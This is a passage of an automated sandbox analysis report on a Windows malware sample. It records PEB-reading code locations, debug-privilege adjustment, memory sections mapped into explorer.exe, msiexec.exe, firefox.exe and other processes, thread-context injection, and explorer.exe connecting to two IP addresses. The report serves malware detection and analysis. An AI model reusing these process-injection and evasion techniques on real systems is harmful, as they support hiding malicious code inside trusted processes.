Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_1EF66B80 mov eax, dword ptr fs:[00000030h]7_2_1EF66B80
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00152C69 mov eax, dword ptr fs:[00000030h]7_2_00152C69
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00154367 mov eax, dword ptr fs:[00000030h]7_2_00154367
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_0015849C mov eax, dword ptr fs:[00000030h]7_2_0015849C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00152B48 mov eax, dword ptr fs:[00000030h]7_2_00152B48
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00158CCF mov eax, dword ptr fs:[00000030h]7_2_00158CCF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_001597C0 mov eax, dword ptr fs:[00000030h]7_2_001597C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00159B19 mov eax, dword ptr fs:[00000030h]7_2_00159B19
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 7_2_00151DA7 mov eax, dword ptr fs:[00000030h]7_2_00151DA7
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00242C69 mov eax, dword ptr fs:[00000030h]14_2_00242C69
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_0024849C mov eax, dword ptr fs:[00000030h]14_2_0024849C
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00248CCF mov eax, dword ptr fs:[00000030h]14_2_00248CCF
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00249B19 mov eax, dword ptr fs:[00000030h]14_2_00249B19
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00244367 mov eax, dword ptr fs:[00000030h]14_2_00244367
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00242B48 mov eax, dword ptr fs:[00000030h]14_2_00242B48
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_00241DA7 mov eax, dword ptr fs:[00000030h]14_2_00241DA7
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 14_2_002497C0 mov eax, dword ptr fs:[00000030h]14_2_002497C0
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00152C69 mov eax, dword ptr fs:[00000030h]15_2_00152C69
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_0015849C mov eax, dword ptr fs:[00000030h]15_2_0015849C
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00158CCF mov eax, dword ptr fs:[00000030h]15_2_00158CCF
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00159B19 mov eax, dword ptr fs:[00000030h]15_2_00159B19
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00152B48 mov eax, dword ptr fs:[00000030h]15_2_00152B48
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00154367 mov eax, dword ptr fs:[00000030h]15_2_00154367
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_00151DA7 mov eax, dword ptr fs:[00000030h]15_2_00151DA7
Source: C:\Program Files\Rutf\IconCache-ze.exeCode function: 15_2_001597C0 mov eax, dword ptr fs:[00000030h]15_2_001597C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76B80 mov eax, dword ptr fs:[00000030h]17_2_1ED76B80
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00152C69 mov eax, dword ptr fs:[00000030h]17_2_00152C69
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00154367 mov eax, dword ptr fs:[00000030h]17_2_00154367
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015849C mov eax, dword ptr fs:[00000030h]17_2_0015849C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00152B48 mov eax, dword ptr fs:[00000030h]17_2_00152B48
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00158CCF mov eax, dword ptr fs:[00000030h]17_2_00158CCF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_001597C0 mov eax, dword ptr fs:[00000030h]17_2_001597C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00159B19 mov eax, dword ptr fs:[00000030h]17_2_00159B19
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00151DA7 mov eax, dword ptr fs:[00000030h]17_2_00151DA7
Enables debug privilegesShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\explorer.exeNetwork Connect: 34.253.89.155 80Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 35.208.146.4 80Jump to behavior
Maps a DLL or memory area into another processShow sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: unknown target: C:\Windows\System32\msiexec.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: unknown target: C:\Windows\System32\msiexec.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: unknown target: C:\Windows\System32\audiodg.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: unknown target: C:\Windows\System32\audiodg.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: unknown target: C:\Windows\System32\msdt.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeSection loaded: unknown target: C:\Windows\System32\msdt.exe protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\Desktop\___ __ ___.exeThread register set: target process: 304Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread register set: target process: 1508Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread register set: target process: 2212Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread register set: target process: 1216Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread register set: target process: 1216Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeThread register set: target process: 1216Jump to behavior
Source: C:\Windows\System32\msiexec.exeThread register set: target process: 1216